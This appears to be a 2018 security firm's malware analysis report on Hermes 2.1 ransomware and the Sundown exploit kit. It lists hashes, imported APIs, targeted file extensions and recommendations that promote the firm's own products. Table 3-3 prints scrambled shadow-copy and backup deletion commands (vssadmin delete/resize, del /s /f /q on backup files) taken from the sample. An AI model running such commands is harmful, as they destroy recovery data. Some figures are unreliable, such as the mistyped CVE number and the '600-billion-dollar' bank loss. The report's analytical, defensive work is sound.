drive by download and hermes 2 · 2018-05-08 · drive by download and hermes 2.1 2018. 04 30...
TRANSCRIPT
Drive by Download and Hermes 2.1
2018. 04 30
Malware Analysis Monthly Report (2018-04)
This report describes Hermes 2.1 which is the ransomware making a computer infected just by visiting the site.
It was made by SOOSAN INT’s Security Laboratory, and we allow you to use it for research purpose. But SOOSAN
INT has no responsibility for the use of other purposes.
Please keep in mind that you should have the responsibility in that case.
You can reach us via CERT members’ mails
([email protected] / [email protected] / [email protected])
ⓒ 2018 SOOSAN INT. All Rights Reserved.
SOOSAN INT Security Laboratory (CERT)
Malware Analysis Monthly Report (2018-04)
1
Contents
1. Abstract.......................................................................................................................... 2
2. Hermes 2.1 including Sundown Exploit Kit ........................................................... 3
2.1 Hermes and Sundown Exploit ............................................................................................................ 3
2.2 Threat Course and Infection Symptom .......................................................................................... 4
3. Analysis Contents (Hermes 2.1) ............................................................................... 6
3.1 Analyzed Malicious File Info ............................................................................................................... 6
3.2 Dynamic Analysis ............................................................................................................................... 10
4. Recommendations ..................................................................................................... 14
Malware Analysis Monthly Report (2018-04)
2
1. Abstract
We were asked to analyze a ransomware infection in the last month. After analyzing a
threat course and infection symptoms, we concluded that it was Hermes 2.1. This
ransomware is more advanced than Hermes’s previous version, in terms of using Sundown
Exploit Kit. In other words, it was discovered Sundown Exploit Kit was used at Hermes 2.1.
It’s known that Sundown in Hermes 2.1 is targeting the Adobe Flash’s exploit which is
called CVE-2018-48781). Our CERT team evaluated it was very risky because this targeting
would infect a user just by visiting an internet site.
In most sites, some engines often use Adobe Flash to set up contents. So, the hacker can
inject the malware such as Hermes to the content using its vulnerability. Through this way,
the hacker can infect the site visitors. For reference, its attack technique was called ‘Drive-
by-Download’. In reality, we found its usage in Hermes 2.1.
Furthermore, we discovered that Hermes 2.1 attacked 5,100 file types, which is very risky.
For reference, Hermes attack ranges far more widely than WannaCry does2). Also, we
found the malicious behavior of Hermes 2.1 deleting the recovery files which play a role
of recovering the encrypted files from the ransomware attack.
To sum up, we concluded that it was so risky that we analyzed it. The order of this report
is as follow. First, we are going to explain the history of Hermes and the features of
Sundown Exploit Kit. And then we will show you how to infect and to attack your device.
In 3 sections, the behavior of Hermes 2.1 is being introduced. Finally, we will give you the
recommendation to be safe from Hermes 2.1
1) CVE (Common Vulnerabilities and Exposures)
- It’s a list of publicly known security vulnerability; so, it contains the publishing year and
identification number.
2) WannaCry: As it happened on May 2017, it infected 300K devices in 150 nations.
Malware Analysis Monthly Report (2018-04)
3
2. Hermes 2.1 including Sundown Exploit Kit
Hermes 2.1 is the advanced ransomware attack. In other words, Hermes is the combination
version of the prior version of Hermes with Sundown Exploit Kit. In this section, the original
version of Hermes and Sundown Exploit Kit will be briefly explained. And the we are looking
into the cyber attack feature and risk level of Hermes 2.1.
2.1 Hermes and Sundown Exploit
Hermes is the ransomware known through cyber-attacking FEIB (Far Eastern International
Bank) at October 2017. Lazarus, the North Korean Hacking Group, was suspected to cyber-
attack FEIB. According to FEIB, it was estimated to have incurred 600-billion-dollar loss3). It
was discovered that the amount of money had been transferred to the accounts of the
banks located in several countries including Cambodia, U.S.A, Sri Lanka and etc. It seemed
that Hermes wasn’t used for ransomware purpose. Instead, a cyber security concluded that
this malware had been used to disrupt analysists from figuring out the details of its incident.
An exploit kit (also called exploit pack) is a toolkit that automates the exploitation of client-
side vulnerabilities. In most case, an exploit kit often targets website’s programs such as
Adobe Flash, Java, Browser and etc. in order to carry out Drive-by-Download attack. As
one of type of Exploit Kit, Sundown targets the vulnerability of Adobe Flash to allow a
hacker to inject a malware in the site.
To sum up, making ill use of Sundown Exploit Kit, Hermes 2.1 was maliciously uploaded
on the site, which infected the visitors. This infection process of ransomware was discovered
before. On December 2017, the ransomware ‘Matrix’ was big issue because like Hermes
2.1, it would infect the users though the internet sites. For reference, some security experts
assumed that the Matrix hacker is same to Hermes 2.1 hacker.
3) Bank Info Security (Oct. 9 2017), “Report: Malware-Wielding Hackers Hit Taiwanese Bank”,
https://www.bankinfosecurity.com/report-malware-wielding-hackers-hit-taiwanese-bank-a-10368.
Malware Analysis Monthly Report (2018-04)
4
2.2 Threat Course and Infection Symptom
Figure 2-1 describes the concept of Hermes 2.1’s threat course and infection symptom:
[Figure 2-1] Hermes 2.1 Attack Process
According to our analysis, the hacker used Drive-by-Download technique to inject Hermes
2.1 using Sundown Exploit Kit. The Sundown was after Flash’s exploit which had been
published as CVE-2018-48784). This exploit was discovered in the previous versions of
Adobe Flash 20.0.0.137. Thus, the sites using these versions have more possibility to be
abused by the hacker. And the site visitors would be infected by Hermes 2.1.
In Hermes 2.1, we discovered the behavior to delete Shadow File Copy5) in Vssadmin6). That
malicious behavior disrupts the file recovery. Next, Hermes 2.1 carries out encrypting the
targeted files using AES/RSA. Finally, Hermes 2.1 made the text to inform that a user was
infected by Hermes 2.1 and to demand the cryptocurrency (DASH coin).
4) CVE-2018-4878: It is the exploit to execute the remote code in Adobe Flash.
5) Shadow File Copy: It’s the file which is temporality saved for the recovery.
6) Vssadmin (Volume Shadow Copy): It’s the storage for shadow copy.
Malware Analysis Monthly Report (2018-04)
5
We described Hermes and Sundown Exploit Kit above, and concluded as listed below:
1. We concluded that the Sundown Expolit Kit has high diffusion because it can spread
easilty using “Drive-by-Download” technique.
2. Heremes 2.1 is a type of ransomware to attack the files. So, we think that it’s very
risky to the institutions which stores the important files.
3. We evaluated Hermes 2.1’s threat is in the same level of WannaCry’s threat level in
terms of the attack range and the diffusion level.
Malware Analysis Monthly Report (2018-04)
6
3. Analysis Contents (Hermes 2.1)
Our CERT has analyzed Hermes 2.1. Its contents are described in the following sub sections:
3.1 Analyzed Malicious File Info
The analyzed file name is “[Temporality Saved File].exe”. The file hash is as follows
- MD5: a45c1a696cc5e634c12c2a296966ecb7
- SHA-1: 92d2c2c5ae6d5af7e7723ff1c21c136d4f664daf
- SHA-256: 3f8eef075d1d96c4730bedf5039de9508b3805fbe7cffdcd08b61ea9ec101ed
Table 3-1 introduces the list of APIs which was discovered in Hermes 2.1. Table 3-2 shows
the targeted type of file extension for Hermes 2.1 encryption. Table 3-3 introduces the
command line which disrupts the file recoveries.
[Table 3-1] Hermes 2.1’s API lists
Hermes 2.1’s API lists
kernel32.dll LoadLibraryA GetModuleFileNameW
VirtualFree Wow64DisableWow64FsRedirection
FindFirstFileW SetFileAttributesA
FindNextFileW CopyFileW
GetModuleFileNameA DeleteFileW
Wow64RevertWow64FsRedirection ReadFile
SetFilePointer GetFileSize
CreateFileA GetVersionExW
VirtualAlloc GetFileAttributesW
CloseHandle GetFileAttributesA
GetWindowsDirectoryW FindClose
CreateDirectoryW WinExec
CreateFileW Sleep
Malware Analysis Monthly Report (2018-04)
7
WriteFile ExitProcess
CreateProcessW GetCurrentProcess
GetModuleHandleA GetLogicalDrives
CreateProcessA SetFileAttributesW
CopyFileA GetStartupInfoW
GetCommandLineW GetTickCount
FreeLibrary GetDriveTypeW
GlobalAlloc GetSystemDefaultLangID
mpr.dll WNetOpenEnumW
WNetEnumResourceW
WNetCloseEnum
advapi32.dll CryptEncrypt GetUserNameA
CryptDecrypt GetUserNameW
CryptGenKey RegOpenKeyExA
CryptDestroyKey RegOpenKeyExW
CryptExportKey RegQueryValueExA
CryptImportKey RegCloseKey
CryptDeriveKey RegDeleteValueW
CryptAcquireContextW RegSetValueExW
ole32.dll CoInitialize
CoCreateInstance
Shell32.dll ShellExecuteW
ShellExecuteA
Malware Analysis Monthly Report (2018-04)
8
[Table 3-2] Lists of Targeted file types by Hermes 2.1
.tif.php.1cd.7z.cd.1cd.dbf.ai.arw.txt.doc.docm.docx.zip.rar.xlsx.xls.xlsb.xlsm.jpg.jpe.jpeg.bmp.db.eql.s
ql.adp.mdf.frm.mdb.odb.odm.odp.ods.dbc.frx.db2.dbs.pds.pdt.pdf.dt.cf.cfu.mxl.epf.kdbx.erf.vrp.grs.
geo.st.pff.mft.efd.3dm.3ds.rib.ma.max.lwo.lws.m3d.mb.obj.x.x3d.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.
adn.a3d.aft.ahd.alf.ask.awdb.azz.bdb.bib.bnd.bok.btr.bak.cdb.ckp.clkw.cma.crd.dad.daf.db3.dbk.dbt
.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.fcd.fic.fid.fil.fm
5.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdn.mdt.mrg.mud.
mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.oqy.ora.orx.$$$.$01.$db.$efs.$er.__a.__b.{pb.~cw.~h
m.0.00.000.001.002.1.101.103.108.110.113.123.123c.123d.123dx.128.1cd.1pe.1ph.1sp.1st.256.264.2
d.2mg.3.32x.3d.3d2.3d4.3da.3dc.3dd.3df.3df8.3dl.3dm.3dmf.3dmk.3don.3dp.3dr.3ds.3dt.3dv.3dw.3
dx.3dxml.3fr.3g2.3ga.3gp.3gp2.3gpp.3gpp2.3me.3mm.3p2.3pe.3pr.3w.4db.4dd.4dl.4dv.4mp.4th.4w
7.555.602.60d.73b.73c.73l.787.7z.7zip.8.890.89t.89y.8ba.8bc.8be.8bf.8bi.8bi8.8bl.8bs.8bx.8by.8ld.8li.
8pbs.8st.8svx.8xg.8xk.8xs.8xt.8xv.9xt.9xy.a.av.a00.a01.a02.a1wish.a26.a2c.a2l.a2m.a2theme.a2w.a3l.
a3m.a3w.a4l.a4m.a4p.a4w.a52.a5l.a5rpt.a5w.a5wcmp.a65.a8s.aa.aa3.aac.aaf.aah.aam.aao.aaui.ab.ab
1.ab2.ab3.ab4.ab65.aba.abc.abcd.abdata.abf.abi.abk.abkprj.abp.abs.abt.abw.abx.aby.ac2.ac3.ac5.ac
6.aca.acbl.acc.accda.accdb.accdc.accde.accdr.accdt.accdu.accdw.accft.acd.ace.acf.acg.ach.aco.acp.a
cr.acrobatsecuritysettings.acrodata.acroplugin.acrypt.act.actm.actx.acv.acw.acx.ad.ada.adb.adblock.
adc.adcp.add.addin.addon.ade.adf.adi.adn.ado.adobebridge.adoc.ados.adox.adp.adpb.adpp.adr.ad
s.adt.adu.adv.advs.adx.adz.aea.aec.aep.aepx.aes.aet.aetx.aex.afd.afdesign.afe.aff.afm.afp.afs.aft.agb.
agd.agd1.agdl.age3rec.age3sav.age3scn.age3xrec.age3xsav.age3xscn.age3yrec.age3ysav.age3yscn.
agg.aggr.agi.agx.ahd.ahf.ahl.ahs.ahu.ai.aia.aif.aifb.aiff.aim.ain.aip.ais.ait.aiu.aiv.ajp.ak.al.al8.ala.alb.alb
3.alb4.alb5.alb6.alc.ald.ale.alf.ali.allet.alm.alp.alr.alt3.alt5.alv.alx.alz.am.am1.am4.am5.am6.am7.amb.
amc.amf.aml.amm.amp.amr.ams.amsorm.amt.amu.amv.amx.amxx.an.an1.an2.an8.ane.anim.animset
.animset_ingame.anl.anm.anme.ann.ans.ansr.ansym.anx.any.aof.aoi.aois.aom.ap.ap_.apa.apd.ape.ap
f.aph.api.apj.apk.apl.aplg.aplp.apnx.apo.app.applet.application.appref
Ms.approj.appx.appxsym.appxupload.apr.aps.apt.apw.apxl.apz.aqt.ar.arc.arch00.arcut.ard.arena.arf.a
rff.arg.arh.ari.arj.ark.arl.aro.arp.arpack.arr.ars.arsc.artproj.arw.arx.as.as$.as2proj.as3.as3proj.as4.asa.a
sat.asax.asc.ascii.ascm.ascs.ascx.asd.asdb.ase.asef.asf.ash.ashbak.ashdisc.ashprj.ashx.asi.ask.asl.asm.
asmx.asn.asnd.asp.aspx.asr.asset.asstrm.ast.asv.asvf.asvx.aswcs.asws.asx.asy.atc.ate.atf.ath.ati.atl.atm
.atn.atom.atomsvc.atr.ats.att.atw.atx.aty.atz.au3.aut.automaticdestinations.autoplay.aux.av.ava.avb.a
vc.avchd.avd.ave.avhd.avi.avj.avn.avp.avs.avv.avx.aw.awcav.awd.awdb.awe.awg.awlive.awm.awp.aws
.awt.aww.awwp.ax.axd.axe.axm.axp.axt.axx.azf.azs.azw.azw1.azw3.azw4.azz.azzx.b.b1.b27.b2a.b3d.b
5i.b5t.b64.b6i.b6t.ba.bac.back.backup.backupdb.bad.bafl.bak.bak~.bak2.bak3.bakx.bamboopaper.
bank.bar.bas.base.baserproj.basex.bat.bau.bav.bax.bay.bb.bb3.bbb.bbc.bbcd.bbl.bbprojectd.bbs.bb
xt.bbz.bc5.bc6.bc7.bcc.bcd.bci.bck.bckp.bcl.bcm.bcmx.bcp.bcs.bct.bdb.bdb2.bdc.bdf.bdic.bdl.bdm.
bdmv.bdp.bdr.bdsproj.bdt2.bdt3.bean.bed.bet.bf.bfa.bfg.bfm.bfs.bfx.bgi.bgl.bgt.bgv.bgz.bh.bho.bh
x.bi8.bib.bibtex.bic.bif.big.bik.bil.bim.bin.bina.bionix.bip.biq.bit.bitpim.bix.bizdocument.bjl.bjo.bk.b
k!.bk1.bk2.bk3.bk4.bk5.bk6.bk7.bk8.bk9.bkc.bkf.bkg.bkk.bkp.bks.bkup.bkz.blb · · · · · · · · · · · · · · · ·
Malware Analysis Monthly Report (2018-04)
9
[Table 3-3] Command lines to delete shadow Copy (vssadmin)
CMD’s command line
(Recovery File Deletion)
004054D0 - /for=d: /on=d: storage /for=g: e shadowstorage
vssadmin Delete vssadmin resize .dsk
00405526 - del /s /f .wbcat f:\*.bkf \*.bac h:\*.bak \*.set
h:\*.win bkf h:\Backup*.*ac f:\*.bak f:\*et f:\*.win
f:\*:\backup*.* g:\*/q g:\*.VHD g:\*l /s /f /q c:\*.h:\*.wbcat
h:\*..
004055D5 - "ZW:
004055DC - [#8./for=c: /on=c: / shadowstorage /\*.dsk
00405608 - del /s /h:\*.dsk
0040561A - del %0bcat e:\*.bkf e:.bac g:\*.bak g:.set g:\*.win g:
h:\backup*.* h:f /q h:\*.VHD h:wstorage /for=h:/on=g:
/maxsize=dowstorage /for=: /maxsize=401MBat d:\*.bkf
d:\BVHD c:\*.bac c:\*.* c:\*.set c:\del /s /f /q d:\f:\Backup*.*
f:\\Backup*.* e:\baadmin resize shaor=d: /on=d: /masize
shadowstorasize=401MB
0040574C - vssa f:\*.VHD f:\*.bge /for=c: /on=c c:\*.bkf
c:\Bac:\*.VHD e:\*.bac:\*.bak d:\*.wbc*.VHD d:\*.bac dup*.*
d:\*.set d e:\*.win e:\*.ddmin resize shadunbounded
004057EB - vssad
004057F2 - del /s /f /q e /all /quiet
0040580E - demaxsize=unboundeze shadowstorageiet
00405835 - vssadmin re
00405841 - vssadmin resize /on=h: /maxsizeshadowstorage
/fowstorage /for=ff g:\Backup*.* gsadmin resize shbounded
004058A9 - vssadmid
004058B3 - vssadmin resig: /on=g: /maxsi\*.wbcat
g:\*.bkackup*.* d:\back:\*.win d:\*.dskfor=e: /on=e:
/mze=401MB
0040591A - vssadm=401MB
00405928 - vssadminn=h: /maxsize=unorage /for=h: /omin resize
shadohadowstorage /fokup*.* c:\backupsk
00405984 - del /s /f /qadowstorage /forssadmin resize sbackup*.*
f:\*.se=unbounded
004059CD - vssaxsize=401MB
004059DE - vsn Delete Shadows=e: /on=e: /maxs*.bak
c:\*.wbcatckup*.* e:\*.set resize shadowstShadows /all
/quize=unbounded
00405A4F - v e:\*.bak e:\*.win resize shadowr=f: /on=f: /max
00405A82 - vssadmin resiz: /on=f: /maxsiz
Malware Analysis Monthly Report (2018-04)
10
3.2 Dynamic Analysis
1. As you can see in fig. 3-1, the assembly MOV command line in “MOV ESI”,
“HerMes.00406218” means to move something. The register of ESI plays a role of data
memory unit of CPU, indicating the target of copy. Therefore, it means copying 00406218
address, the contents at the address 00406218 is file types which is encrypted by Hermes
2.1
[Figure 3-1] Targeted file types
[Figure 3-2] Contents in 00406218 address
Malware Analysis Monthly Report (2018-04)
11
2. Fig 3-2 shows the evidence that a file was encrypted using RSA and AES encryption
algorithms.
[그림 3-3] RSA/AES
3. We found that Hermes 2.1 had loaded the targeted file types through CreateFileA
function. For reference, the role of CreateFileA is to create, and open I/O or files.
[Figure 3-4] Process of file encryption
Malware Analysis Monthly Report (2018-04)
12
4. After opening the files through CreateFileA function, Hermes 2.1 started to encrypt the files,
using WriteFile function.
[그림 3-5] Encryption Command line
Malware Analysis Monthly Report (2018-04)
13
5. Fig. 3-6 describes the changing process of the file extension to .HRM.
[Figure 3-6] Process of file extension change 암호화 진행 과정
Malware Analysis Monthly Report (2018-04)
14
4. Recommendations
[Figure 4-1] Three Steps for Ransomware Attack Mitigation
1. (First Step) Prevention: Regular update of AV (Anti-Virus) and systems
To prevent against malware, you should regularly update AV and systems at least.
Like Hermes 2.1, the number of cyber-attacks using exploit is on increase.
2. (Second Step) Detection: Detection of Malicious Site with eWalker/ePrism
It’s important not to visit the ransomware-infected site. However, it’s difficult. There
is no way personally to know that’s the infected site. So, we recommend for you to
use eWalker/ePrism. eWalker has more than 400k malicious site DB and updates
30k malicious DB. So, eWalker can prevent you from being infected though Drive-
by-Download. Also, if you use ePrism, you can be safe from the technique to hide
the malware including ransomware through network traffic encryption.
3. (Third Step) Reaction: Securing important assets with eRed introduction
eRed is a security solution to block the unauthorized process from being excuted
based on white-list. You can be safe from the ransomware including Hermes 2.1
because it doesn’t allow the malicious behavior to be run. In reality, we inject
Hermes 2.1 to the server protected by eRed and checked wether eRed prevented
it. It’s apparent that it has the robust security because it’s working on Hypervisor
OS which is under guest OS. Your system can be safe with eRed.
Malware Analysis Monthly Report (2018-04)
15
2018 SOOAN INT Security Analysis Reports
Malware Analysis Monthly Report
2018-01: Cryptocurrency Mining Malware Analysis (January 2018)
2018-02: UBoat RAT Analysis Report (February 2018)
2018-03 Olympic Destroyer Analysis Report
2018-04 Drive by Download and Hermes 2.1
Malware Analysis Monthly Report (2018-04)
16
End of Documents
#3F, Suseo Hyundai Venture-ville, 10, Bamgogae-ro 1-gil, Gangnam-gu, Seoul, Korea 06349
Tel +82-2-541-0073 | Fax +82-2-541-0204
E-mail [email protected]
HP http://www.soosanint.com